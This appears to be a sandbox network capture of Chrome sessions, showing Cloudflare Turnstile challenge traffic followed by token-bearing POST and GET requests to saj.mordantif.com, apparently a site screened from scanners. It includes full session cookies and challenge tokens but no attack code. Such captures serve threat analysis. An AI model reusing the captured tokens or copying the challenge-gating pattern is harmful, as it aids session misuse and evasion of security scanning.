                                                        2024-09-13 13:06:53 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 33900
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Content-type: application/x-www-form-urlencoded
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        CF-Challenge: 7cbe35d3fcb33be
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:53 UTC16384OUTData Raw: 76 5f 38 63 32 38 35 61 65 66 62 66 39 37 31 38 32 31 3d 53 45 67 78 79 5a 36 4b 46 69 67 71 67 42 59 65 5a 41 42 61 67 65 72 36 31 41 6f 78 53 49 6e 71 4d 41 31 41 32 49 71 4f 41 50 41 74 49 34 4f 41 6b 41 6b 49 32 6b 5a 49 41 68 32 41 61 49 49 65 4f 36 69 41 32 47 46 41 73 63 49 65 50 71 44 78 65 4b 41 6b 78 36 33 42 44 51 5a 5a 6f 6e 41 5a 73 5a 64 38 46 2d 41 5a 6e 24 50 41 68 49 5a 72 41 65 49 49 39 67 41 7a 6f 45 41 73 33 33 67 36 61 74 62 61 65 51 49 41 55 37 41 41 55 4a 4d 72 6d 6c 41 36 7a 51 66 4f 6d 32 4a 71 4d 41 64 52 6e 41 75 59 42 57 45 7a 32 41 32 63 6d 70 35 32 71 6c 38 72 67 41 56 73 7a 4d 58 79 35 30 38 78 41 50 41 67 44 6f 4a 42 44 38 52 69 47 37 4a 34 30 4b 72 54 30 34 41 75 62 2d 34 44 51 4a 53 77 38 53 55 77 30 4c 66 59 6b 53 41 66
                                                        Data Ascii: v_8c285aefbf971821=SEgxyZ6KFigqgBYeZABager61AoxSInqMA1A2IqOAPAtI4OAkAkI2kZIAh2AaIIeO6iA2GFAscIePqDxeKAkx63BDQZZonAZsZd8F-AZn$PAhIZrAeII9gAzoEAs33g6atbaeQIAU7AAUJMrmlA6zQfOm2JqMAdRnAuYBWEz2A2cmp52ql8rgAVszMXy508xAPAgDoJBD8RiG7J40KrT04Aub-4DQJSw8SUw0LfYkSAf
                                                        2024-09-13 13:06:53 UTC16384OUTData Raw: 77 6f 4b 37 4e 78 61 54 66 58 2b 4e 78 76 41 59 2b 56 41 61 78 71 49 65 4d 41 73 49 38 78 5a 67 36 32 61 39 37 57 78 41 79 41 54 75 6f 4d 36 71 66 34 72 36 45 41 36 41 61 4c 36 41 41 56 41 50 72 65 6f 36 34 41 7a 49 34 38 41 66 56 6d 49 42 4c 41 46 41 58 49 42 4f 36 47 41 51 6e 5a 78 36 44 41 44 55 6f 4b 41 77 41 38 49 42 6a 57 58 66 4e 66 48 78 36 54 66 65 6e 32 6e 36 4b 41 39 78 42 41 65 42 61 4b 49 5a 4f 41 72 41 7a 67 41 49 41 4c 38 61 49 36 78 5a 57 41 4d 78 4f 49 5a 34 41 75 49 71 49 41 48 41 33 41 69 54 41 6c 46 54 41 53 4f 41 69 41 61 6e 71 6e 5a 36 6e 68 4d 5a 4f 41 36 6e 4b 49 65 78 65 44 52 53 75 6e 75 32 31 41 68 32 5a 4b 36 44 66 44 6e 36 6f 65 72 42 33 4f 41 55 41 2b 73 5a 45 32 79 41 6e 46 34 49 61 67 70 31 41 4e 35 2d 46 36 24 41 59 77 55
                                                        Data Ascii: woK7NxaTfX+NxvAY+VAaxqIeMAsI8xZg62a97WxAyATuoM6qf4r6EA6AaL6AAVAPreo64AzI48AfVmIBLAFAXIBO6GAQnZx6DADUoKAwA8IBjWXfNfHx6Tfen2n6KA9xBAeBaKIZOArAzgAIAL8aI6xZWAMxOIZ4AuIqIAHA3AiTAlFTASOAiAanqnZ6nhMZOA6nKIexeDRSunu21Ah2ZK6DfDn6oerB3OAUA+sZE2yAnF4Iagp1AN5-F6$AYwU
                                                        2024-09-13 13:06:53 UTC1132OUTData Raw: 37 77 32 45 30 6e 24 34 41 6e 59 4a 32 47 32 61 32 59 63 69 61 70 6e 5a 59 46 48 72 51 76 39 79 4e 48 36 6f 78 34 41 53 4c 47 51 41 54 36 24 4e 55 5a 6e 51 2b 5a 5a 62 2d 6d 37 35 30 76 4f 79 78 4f 72 69 30 50 58 41 50 69 76 4b 6a 48 38 55 66 74 48 51 36 67 4d 62 77 6f 36 7a 41 4f 56 69 65 69 79 4c 6c 78 5a 70 6a 67 31 46 63 4f 67 41 39 4c 72 4e 74 58 64 6d 41 61 4c 36 34 37 36 61 31 32 31 52 64 45 44 55 6c 48 4e 56 6b 78 38 50 31 30 5a 59 4c 56 35 53 47 76 77 6f 31 30 53 50 36 6e 2b 45 6f 45 69 72 51 78 67 6e 41 24 79 2d 41 75 50 35 32 77 67 31 78 47 58 61 57 70 41 46 4c 71 78 36 4f 6e 75 50 45 48 6d 67 31 73 6b 67 68 6c 57 78 46 6e 41 75 4e 6e 65 63 30 61 47 51 6d 58 34 50 66 52 76 56 45 36 6c 46 38 68 72 4d 45 45 71 52 51 61 31 24 35 53 6e 6c 30 4f 4a
                                                        Data Ascii: 7w2E0n$4AnYJ2G2a2YciapnZYFHrQv9yNH6ox4ASLGQAT6$NUZnQ+ZZb-m750vOyxOri0PXAPivKjH8UftHQ6gMbwo6zAOVieiyLlxZpjg1FcOgA9LrNtXdmAaL6476a121RdEDUlHNVkx8P10ZYLV5SGvwo10SP6n+EoEirQxgnA$y-AuP52wg1xGXaWpAFLqx6OnuPEHmg1skghlWxFnAuNnec0aGQmX4PfRvVE6lF8hrMEEqRQa1$5Snl0OJ
                                                        2024-09-13 13:06:53 UTC1237INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4476
                                                        Connection: close
                                                        cf-chl-out: FOHjqis+9ncrqQeZ3bxLF3mZ++bYvxzaf9GpXKDBnD4zwy/fI7MmSMda5Qg5QoWs+BYHlU5LvmA3buQkM0oYUJthMHbSJ/xgtB2l+6Mo/bA7n9WG4NOIyTc=$WDcDUdfJrO6dvc0O
                                                        cf-chl-out-s: gPsjNxwgSeAc8VyGAYOQsOxblrpj1a6VwlPBwwFAyu297X96zF8iuyV9uor1pOhEnn+SbpGcze92RXcMpLMoXLpaBF36thFDoREN6EqWNDRFZO5QGQhbgxiE6DdE6/TfsphLz+16YQvRvomymWtsdLS1x52GYgzh5tDM5zseBFJeqqXlw6/VJ9aw9yIGiCGCcwgoLugPgbZ5zFyS/FkSPOH1vYpKnzPj+l54NsJ7SN6Y4xi4WmHd9XNYS/BPTrUKZzGS48ew1l28Of1QuAt7dZQRmtXZ51RZSOEv7Akw1IHHyEREkfysVZ9M27ZJV2g43X+OmLa7ruL19FxwU3x865S/A2CnkKnC55T4k1m7btAbo3e7Pqg/FayVscOqYOioOao4CwJr3zWdaKnRm02GRwIr3UQCZsjRdqmeCIZT9ruRh8ZjlvD6W88sRqbQI2M6ohWYv1m898Rg89KGUmDb2lx+1aDcbfhnlgiOVNL72xomvPd5W8uGGbHDXO5eoiCtJFDEhe25CP7qQPgjGKauEWVcpqZ51wtrQch17fLdO1zcMdGhFNTXQm6ZQl9kCRQgQ37eY0B/zUYg3G2KsxheYBLV1oiy7NrVwXRma1tc/SIxylWfZYDz64ZnwlOZQkDJ5p29bhLjxhGdCtycJK/FaQOx33yKSvAjMmIBfGMc9K5N3E29Fw7AQLy2H9oCFe2M6dsZN7QmzfOdtBZPypYpvFrCnpSV1n9+7dU9IfxKoTnj4xx5Y7Z9JFWY+IbyWb/nUeVdeO47T1W8jyiUmYx+UODh7l6LEb6Ul1NS8Cz3fO3IoDrNFj6hT0Lnh92T7cDm11w=$tuiAnRVypNtX4yMT
                                                        Server: cloudflare
                                                        CF-RAY: 8c285b6e0b290c9e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:53 UTC132INData Raw: 72 36 75 36 66 70 57 41 71 62 75 70 67 37 2b 35 72 37 36 67 7a 64 43 50 7a 64 4f 52 77 35 62 4d 6b 39 69 32 72 4c 69 62 30 4a 4f 61 6d 64 33 65 70 5a 37 54 6f 4b 62 4d 79 65 7a 46 79 72 79 6f 79 63 37 41 36 63 6a 6f 72 2f 54 4a 36 38 36 35 2f 76 37 32 76 66 4c 35 7a 63 58 79 2f 41 6e 65 36 74 72 47 43 76 72 37 2b 75 6f 50 35 38 72 77 46 77 4c 54 43 2b 7a 5a 48 52 48 62 39 66 73 61 33 77 38 57
                                                        Data Ascii: r6u6fpWAqbupg7+5r76gzdCPzdORw5bMk9i2rLib0JOamd3epZ7ToKbMyezFyryoyc7A6cjor/TJ6865/v72vfL5zcXy/Ane6trGCvr7+uoP58rwFwLTC+zZHRHb9fsa3w8W
                                                        2024-09-13 13:06:53 UTC1369INData Raw: 44 68 6e 79 42 2b 55 67 41 75 59 4e 36 68 34 61 49 2b 7a 7a 49 69 58 79 36 53 45 58 49 2f 48 36 4c 6a 6f 68 4b 55 49 39 4c 54 55 30 51 55 45 62 50 45 42 45 46 69 41 39 50 45 73 76 56 44 31 4f 4b 77 35 52 57 69 5a 63 4f 67 38 31 53 52 63 7a 58 42 70 66 5a 6c 34 7a 50 69 67 6e 4a 57 4e 72 4e 6a 68 62 4d 56 4e 6f 50 32 77 73 51 30 46 76 59 6b 6c 77 65 30 74 4d 67 57 74 72 51 44 39 65 63 56 35 69 5a 57 74 6a 6a 47 43 4d 59 55 4a 4b 61 47 57 53 6b 6d 64 4e 61 59 78 31 63 58 65 52 6e 56 5a 77 57 57 47 59 6e 57 4b 57 58 59 64 2f 66 33 75 74 69 6e 32 42 65 49 2b 71 68 34 75 45 6e 35 4b 54 6a 49 53 33 75 35 43 48 68 33 69 74 74 6e 2b 6a 6f 37 65 44 68 70 36 38 6d 4d 32 5a 6f 6f 32 65 7a 63 71 76 73 6f 65 79 30 39 6d 32 72 73 4f 35 76 72 37 51 73 61 79 71 6f 62 50
                                                        Data Ascii: DhnyB+UgAuYN6h4aI+zzIiXy6SEXI/H6LjohKUI9LTU0QUEbPEBEFiA9PEsvVD1OKw5RWiZcOg81SRczXBpfZl4zPignJWNrNjhbMVNoP2wsQ0FvYklwe0tMgWtrQD9ecV5iZWtjjGCMYUJKaGWSkmdNaYx1cXeRnVZwWWGYnWKWXYd/f3utin2BeI+qh4uEn5KTjIS3u5CHh3ittn+jo7eDhp68mM2Zoo2ezcqvsoey09m2rsO5vr7QsayqobP
                                                        2024-09-13 13:06:53 UTC1369INData Raw: 66 6e 71 49 4f 6e 2b 44 68 4c 73 39 50 51 69 46 7a 67 6a 4f 43 38 31 46 79 30 64 49 6b 49 30 49 55 45 43 4f 51 45 47 47 44 55 47 4f 44 67 74 49 7a 78 4b 54 7a 31 45 55 46 4a 54 4b 6a 68 46 54 31 6b 51 54 43 39 5a 47 30 45 78 46 7a 5a 47 59 56 68 65 53 30 77 71 51 56 42 44 59 44 4a 65 4c 6b 59 7a 63 6d 73 78 4e 32 77 30 65 48 68 37 64 45 35 41 62 47 4e 31 59 6f 4a 2b 68 48 35 39 57 58 79 4b 65 47 39 38 6a 6f 42 4f 68 55 2b 48 56 47 39 32 68 47 39 56 69 6f 70 75 6e 46 32 4d 59 71 53 50 6c 32 43 6c 59 35 4f 4d 65 34 65 4e 61 61 46 37 6f 32 78 31 6f 4a 56 79 69 33 69 61 65 71 78 38 72 4c 4f 39 69 38 42 39 76 4c 47 6b 67 63 57 63 76 4a 6d 46 79 63 43 35 6b 59 6a 51 73 59 32 57 74 5a 48 49 78 63 65 57 79 4e 6e 4d 6e 4c 2b 2b 77 62 66 59 6e 39 58 4a 78 37 72 54
                                                        Data Ascii: fnqIOn+DhLs9PQiFzgjOC81Fy0dIkI0IUECOQEGGDUGODgtIzxKTz1EUFJTKjhFT1kQTC9ZG0ExFzZGYVheS0wqQVBDYDJeLkYzcmsxN2w0eHh7dE5AbGN1YoJ+hH59WXyKeG98joBOhU+HVG92hG9ViopunF2MYqSPl2ClY5OMe4eNaaF7o2x1oJVyi3iaeqx8rLO9i8B9vLGkgcWcvJmFycC5kYjQsY2WtZHIxceWyNnMnL++wbfYn9XJx7rT
                                                        2024-09-13 13:06:53 UTC1369INData Raw: 4d 6c 38 79 38 47 4b 69 4d 74 46 50 4c 37 4f 42 6b 75 4b 30 45 53 48 44 38 79 47 54 63 37 46 43 55 6b 53 79 45 6c 4b 78 31 48 49 69 78 44 4e 69 6f 50 49 54 41 79 4b 46 51 77 4b 6a 6c 50 55 44 6b 62 54 78 68 44 51 30 46 68 51 55 68 42 4c 54 31 67 4d 47 4a 44 50 6a 35 4b 53 6d 67 30 53 6c 52 48 61 33 42 59 54 46 6b 2f 56 59 56 7a 66 56 4a 51 69 46 56 61 66 59 42 57 57 6d 6d 44 59 47 31 77 55 57 6c 75 69 6d 6d 48 61 5a 70 39 63 58 61 53 6c 34 4a 79 6c 6c 78 33 65 71 69 6e 67 58 2b 47 67 5a 79 48 6f 49 57 6c 69 4b 4f 6e 6a 49 61 32 74 36 65 52 68 4b 65 49 6a 5a 79 57 6a 34 36 4f 6b 5a 53 58 74 72 79 53 6d 61 69 71 6c 35 37 51 7a 37 4b 70 6f 4d 65 33 73 61 4f 6c 7a 4b 32 30 79 39 57 77 6c 39 66 53 76 4c 37 43 72 37 6a 57 35 36 57 35 78 36 7a 70 78 37 72 76 78
                                                        Data Ascii: Ml8y8GKiMtFPL7OBkuK0ESHD8yGTc7FCUkSyElKx1HIixDNioPITAyKFQwKjlPUDkbTxhDQ0FhQUhBLT1gMGJDPj5KSmg0SlRHa3BYTFk/VYVzfVJQiFVafYBWWmmDYG1wUWluimmHaZp9cXaSl4Jyllx3eqingX+GgZyHoIWliKOnjIa2t6eRhKeIjZyWj46OkZSXtrySmaiql57Qz7KpoMe3saOlzK20y9Wwl9fSvL7Cr7jW56W5x6zpx7rvx
                                                        2024-09-13 13:06:53 UTC237INData Raw: 79 4f 76 6b 4e 2b 52 54 37 4f 68 73 66 4d 53 59 56 49 79 52 4b 42 51 45 6a 53 67 67 42 43 42 6f 6b 4c 53 45 69 4a 54 45 72 45 54 49 33 4a 78 56 56 4c 54 35 54 47 31 4e 50 47 79 5a 54 56 31 46 65 53 79 56 74 4b 47 74 44 58 6a 39 6d 63 6a 52 4c 61 56 46 59 61 33 4a 53 5a 54 64 36 50 6a 68 75 54 59 46 69 56 31 6c 77 63 59 42 2b 61 32 79 4f 52 55 70 61 62 32 68 2b 63 59 4a 78 65 47 70 61 68 33 70 33 65 34 78 75 61 33 65 57 67 36 57 42 6d 48 57 6f 5a 4a 32 4d 64 34 6d 67 61 34 70 75 6f 35 42 6e 70 47 32 6a 74 6f 57 71 73 6f 65 2b 75 71 6d 54 75 4d 4f 61 77 48 69 31 73 6f 53 55 7a 4b 76 4d 6e 4c 2b 37 6f 61 54 4f 73 73 43 73 6c 4e 62 4d 74 4b 72 49 70 64 54 52 75 2b 48 6a 6e 63 33 68 6e 35 6e 6d 72 61 34 3d
                                                        Data Ascii: yOvkN+RT7OhsfMSYVIyRKBQEjSggBCBokLSEiJTErETI3JxVVLT5TG1NPGyZTV1FeSyVtKGtDXj9mcjRLaVFYa3JSZTd6PjhuTYFiV1lwcYB+a2yORUpab2h+cYJxeGpah3p3e4xua3eWg6WBmHWoZJ2Md4mga4puo5BnpG2jtoWqsoe+uqmTuMOawHi1soSUzKvMnL+7oaTOssCslNbMtKrIpdTRu+Hjnc3hn5nmra4=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.549757104.18.95.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:54 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:54 UTC379INHTTP/1.1 404 Not Found
                                                        Date: Fri, 13 Sep 2024 13:06:54 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 7
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        cf-chl-out: jk42aV7xuZa5LOdrG8e6EuyV5Sqf9UgUOTA=$eK+O+du3F3szWrXa
                                                        Server: cloudflare
                                                        CF-RAY: 8c285b73eac34310-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:54 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                        Data Ascii: invalid


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.549758172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:55 UTC1434OUTPOST /ypEsiIUl5CT4iuptTEAbaxVXn8Z2jjwd4LQaqtbwZaSDIcVcq HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        Content-Length: 1506
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryprnb4QB8AF5exm8A
                                                        Accept: */*
                                                        Origin: https://saj.mordantif.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://saj.mordantif.com/q8Yr/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlJpUXBjZXRpR2NEaitKT25XWjVXalE9PSIsInZhbHVlIjoiZ212N2ZTWUg5bFIvSldZblYrb3hydGVGV09qWDZSZUlxQ1ZXakhQWHNXZlhXTWgrSzN5aVdlVUZ2ZENtWmFZWFJmLzYrSXZyK2NRNUlqNDhvQ0kyemFzMWJBME5Dc1lnWnFUa3B2NUJiWTNhaWN0dHcycXBtTWZ0QVE0M0hPTTgiLCJtYWMiOiI3YmQ5OTcwNzgzYTUxZTE3M2EzY2ViYWMwOGYyZmExNDIzZTFjNWNhOGJlNmUxNmUyYmZmMGNlMDE0ZDMwMjUzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9NUjJ1d0JEMlZ0MHFtTDRiQXQrVGc9PSIsInZhbHVlIjoiQW5qdC9qbWxpaUczZll4WW5ETks2SGN4RTJKc3hiUUFjdmhFQWRzempJZllOd3RSM1ZQSFlWaytsWlN3S3hTZzhMWUw4NnJCT2p4WXl0YVExdG42NHZPUU5UK0pReUVrVHlOc0tXL2xCZ1ZBb216Z0s1dkNQWHJwTkExeEg2MXAiLCJtYWMiOiIyYmRlNWUwOTlkN2Q0MzI4ODFkNGRjZmQzNWNmZTZlZmVhYTUxZmE4YjUwMzcwOWQxMTczYzQxNjRjZDQ3Njc0IiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:06:55 UTC1506OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 70 72 6e 62 34 51 42 38 41 46 35 65 78 6d 38 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 4e 53 46 6c 33 35 51 73 77 44 4a 66 61 5a 69 4b 6f 51 6b 33 52 6e 43 62 6e 65 46 41 65 59 62 50 48 4d 79 69 7a 47 46 67 54 65 75 70 4f 48 54 35 47 53 54 4c 71 32 5a 53 5f 59 66 63 34 5a 52 68 77 2d 51 2d 39 69 70 4a 30 30 5a 4d 68 54 49 70 4e 70 78 57 75 30 5a 46 34 49 55 42 2d 72 37 34 62 5a 50 46 33 43 58 6b 39 67 75 75 36 43 4b 64 70 69 7a 5f 52 62 6c 67 45 58 4d 4b 4b 77 59 59 33 6f 63 4f 6f 6f 65 54 63 52 37 37 6c 49 62 6b 36 42 31
                                                        Data Ascii: ------WebKitFormBoundaryprnb4QB8AF5exm8AContent-Disposition: form-data; name="cf-turnstile-response"0.NSFl35QswDJfaZiKoQk3RnCbneFAeYbPHMyizGFgTeupOHT5GSTLq2ZS_Yfc4ZRhw-Q-9ipJ00ZMhTIpNpxWu0ZF4IUB-r74bZPF3CXk9guu6CKdpiz_RblgEXMKKwYY3ocOooeTcR77lIbk6B1
                                                        2024-09-13 13:07:00 UTC999INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:00 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BSHSdmAPaE1FbdIyZWk0brjQvNO7iye2OxRiI%2FhbVoPs3MGtdDEld%2BSdvfj95v2BeE6%2FCBIEMCvOKsqeqM2HGs6c8%2BroQbNamlywJSIMBJglHyr0EJrbj7ZwwoILHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IjU3RmNrblo0d0ZDQ21WSENZaWhoVFE9PSIsInZhbHVlIjoiVEJKOHNnZUVQRFcvN3FBTWw4RjRwK2tIZWo0Z20zcjFPTEhqMnhlL2xxTXBBVWxmbnRnZW84eTQ0Y0hXZDRjYVpENUJObnRJUGlhdElvR0Y3RGlFcm1Xdm4zNmpvbHp3WjNvZFpKcUM3TCtGRE00cmhOdTdGMnBTUWptaDRHWVMiLCJtYWMiOiJjNDdiNGNmZWJiMzUyODY0MmVhYjQ4ZTE0ZTQ4NjRmMzJlYTU0MWY4YWE1ZDIxODljZjJjMzk4OTliNTEwYWNiIiwidGFnIjoiIn0%3D; expires=Fri, 13-Sep-2024 15:06:59 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-09-13 13:07:00 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 5a 74 5a 6b 35 52 55 55 35 36 4f 58 67 32 5a 30 6c 36 51 33 4a 5a 5a 6b 35 36 54 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 58 4e 33 64 6a 4a 47 65 6d 77 34 4d 6c 52 76 56 57 67 77 62 56 4a 71 4f 48 6f 31 4e 44 64 48 53 7a 51 30 57 57 70 74 4e 7a 49 77 4f 56 4e 42 56 44 68 31 4c 31 64 4a 59 30 4e 4c 4f 55 64 79 54 48 5a 45 56 56 4e 61 54 6b 6c 69 59 31 6b 34 5a 45 39 6d 53 57 73 31 64 46 64 52 52 6d 64 75 59 57 4a 55 64 57 5a 76 52 54 5a 72 51 30 70 6c 53 31 42 33 54 48 68 71 62 56 4a 70 51 58 46 6c 63 46 6b 78 55 6b 35 36 4e 47 52 42 54 6e 64 55 53 44 67 31 4d 30 56 6e 5a 32 64 79 61 45 51 79 4f 57 38 34 61 32 5a 56 62 45 77
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjZtZk5RUU56OXg2Z0l6Q3JZZk56Tmc9PSIsInZhbHVlIjoiVXN3djJGemw4MlRvVWgwbVJqOHo1NDdHSzQ0WWptNzIwOVNBVDh1L1dJY0NLOUdyTHZEVVNaTkliY1k4ZE9mSWs1dFdRRmduYWJUdWZvRTZrQ0plS1B3THhqbVJpQXFlcFkxUk56NGRBTndUSDg1M0VnZ2dyaEQyOW84a2ZVbEw
                                                        2024-09-13 13:07:00 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                        Data Ascii: 14{"status":"success"}
                                                        2024-09-13 13:07:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.549761104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:01 UTC1113OUTGET /ypEsiIUl5CT4iuptTEAbaxVXn8Z2jjwd4LQaqtbwZaSDIcVcq HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IjU3RmNrblo0d0ZDQ21WSENZaWhoVFE9PSIsInZhbHVlIjoiVEJKOHNnZUVQRFcvN3FBTWw4RjRwK2tIZWo0Z20zcjFPTEhqMnhlL2xxTXBBVWxmbnRnZW84eTQ0Y0hXZDRjYVpENUJObnRJUGlhdElvR0Y3RGlFcm1Xdm4zNmpvbHp3WjNvZFpKcUM3TCtGRE00cmhOdTdGMnBTUWptaDRHWVMiLCJtYWMiOiJjNDdiNGNmZWJiMzUyODY0MmVhYjQ4ZTE0ZTQ4NjRmMzJlYTU0MWY4YWE1ZDIxODljZjJjMzk4OTliNTEwYWNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZtZk5RUU56OXg2Z0l6Q3JZZk56Tmc9PSIsInZhbHVlIjoiVXN3djJGemw4MlRvVWgwbVJqOHo1NDdHSzQ0WWptNzIwOVNBVDh1L1dJY0NLOUdyTHZEVVNaTkliY1k4ZE9mSWs1dFdRRmduYWJUdWZvRTZrQ0plS1B3THhqbVJpQXFlcFkxUk56NGRBTndUSDg1M0VnZ2dyaEQyOW84a2ZVbEwiLCJtYWMiOiIzMjRmMTRiY2FhODcyMTFhOTg4NDY2YTc0OTczY2RkMzMzZjQ0YmMxMjdmYzFhM2QzYzNhNjU2Y2Y2ZWI5ZTk3IiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:01 UTC577INHTTP/1.1 404 Not Found
                                                        Date: Fri, 13 Sep 2024 13:07:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UsnXJcK2szkMK%2FQ33JrBMAbyY94awrX8ZwcS6q%2FvkyUgApGImhVD87jbxlweho1Wb7EuwocKYU3ao78wEHCrydHU7hPQ6pe4mLTFVVPWxSDYoR3pt29VIKOKJ1q7dA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285b9ca85c4267-EWR
                                                        2024-09-13 13:07:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.549763172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:01 UTC1443OUTGET /q8Yr/ HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
